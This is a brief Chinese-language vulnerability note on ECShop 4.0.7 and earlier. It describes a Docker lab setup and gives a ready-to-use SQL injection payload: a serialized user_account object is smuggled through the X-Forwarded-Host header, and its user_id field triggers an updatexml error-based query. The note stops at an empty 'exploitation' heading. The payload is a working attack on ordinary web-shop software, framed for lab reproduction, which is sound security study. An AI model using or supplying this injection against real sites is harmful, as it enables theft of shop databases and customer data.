漏洞描述
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序
影响版本:ecshop4.0.7及以下
漏洞环境及利用
docker环境搭建
访问8080端口,数据库主机为mysql,账号密码为root
注册一个账户然后登录
payload
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a
漏洞利用